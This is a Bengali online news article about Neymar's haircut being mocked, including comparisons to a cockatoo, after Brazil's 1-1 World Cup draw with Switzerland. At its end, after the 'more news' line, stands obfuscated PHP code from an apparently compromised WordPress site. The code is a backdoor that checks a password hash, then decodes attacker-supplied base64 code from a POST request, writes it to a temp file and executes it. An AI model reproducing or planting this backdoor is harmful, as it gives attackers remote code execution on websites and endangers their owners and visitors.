মঙ্গলবার, ১৮ই জুন, ২০২৪ খ্রিস্টাব্দ ৪ঠা আষাঢ়, ১৪৩১ বঙ্গাব্দ

কাকাতুয়ার সঙ্গে নেইমারের তুলনা!

news-image

অনলাইন ডেস্ক: রাশিয়ার রোস্তভ অন স্টেডিয়ামে সুইজারল্যান্ডের সঙ্গে ১-১ গোলে ড্র করেছে ব্রাজিল। ম্যাচটিতে ব্রাজিলের প্রাণ ভোমরা নেইমারকে বল পায়ে স্বরূপে দেখা যায়নি। কিন্তু নতুন হেয়ার কাট নিয়ে মাঠে উপস্থিত হন এ পিএসজি তারকা। এরপরই তার চুল নিয়ে সামাজিক যোগাযোগ মাধ্যমে শুরু হয়েছে আলোচনা-সমালোচনা।

কেউ কেউ লিখেছেন, হেয়ারস্টাইলে দশে দশ, আর ফুটবলে শূন্য! চুল তো নয় এ যেন স্প্যাগোটি! নেইমারকে নিয়ে এমন মজার হরেক রকম পোস্ট ঘোরাঘুরি করছে সোশ্যাল মিডিয়ায়। এমনকি ব্রাজিলের সংবাদমাধ্যমগুলোও নেইমারের চুল নিয়ে তুলোধনা শুরু করেছে।

ব্রাজিলিয়ান সংবাদপত্রে কাকাতুয়ার ঝুঁটির সঙ্গে নেইমারের চুলের তুলনা করা হয়েছে। লেখা হয়েছে,নেইমার তো ঝুঁটি বাঁধা পাখি, যার গলায় কোনও সুর নেই। এখানেই শেষ নয়, চাউমিনের ছবি সঙ্গে নেইমারের ছবি প্রকাশ করে প্রকাশ পেয়েছে হরেক রকম ট্রল। এর সঙ্গে রয়েছে ইন্টারনেট দুনিয়ায় নেইমারকে নিয়ে মজার মজার জোকস।

ইনজুরি কাটিয়ে নেইমার যে এখনও পুরোপুরি ফিট নয়, তা নিয়ে কোনও সন্দেহ নেই। সুইজারল্যান্ডের বিরুদ্ধে চাপের মুহূর্তে তাঁর পা থেকে আক্রমণাত্বক শট দেখা যায়নি। সেই সঙ্গে পায়ের চোট নিয়ে ম্যাচের মাঝে বারবার মাটিতে আছড়ে পড়েছেন। ব্রাজিলের অভিযান ম্যাচে নেইমারের হতাশাজনক পারফরম্যান্সের পর তাঁকে নিয়ে বিশ্বকাপে অনেকেই আশা ছেড়ে দিচ্ছেন। প্রথমার্ধে কুতিনহোর গোলে এগিয়ে গিয়েও নেইমাররা সুইসদের বিরুদ্ধে ১-১ গোলে ড্র করে।

বিশ্বকাপের আগে ফুটবল বিশ্বের নজর ছিল রোনালদো, মেসি, নেইমার ত্রয়ীর দিকে। প্রথম ম্যাচেই হ্যাটট্রিক করে সিআর সেভেন বিশ্বকাপের নায়ক হয়ে ওঠার ইঙ্গিত দিয়েছেন। গোল করা তো দূরের কথা, আর্জেন্টিনার প্রথম ম্যাচে পেনাল্টি মিস করে কার্যত খলনায়ক বনে গিয়েছেন মেসি। সেই অর্থে নেইমারকে খলনায়ক বলা যাবে না বটে, তবে সুইজারল্যান্ডের বিরুদ্ধে ব্রাজিলের প্রথম ম্যাচে তাঁকে পার্শ্বচরিত্র হিসেবেও বিবেচনা করা কঠিন হয়ে দাঁড়িয়েছে।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}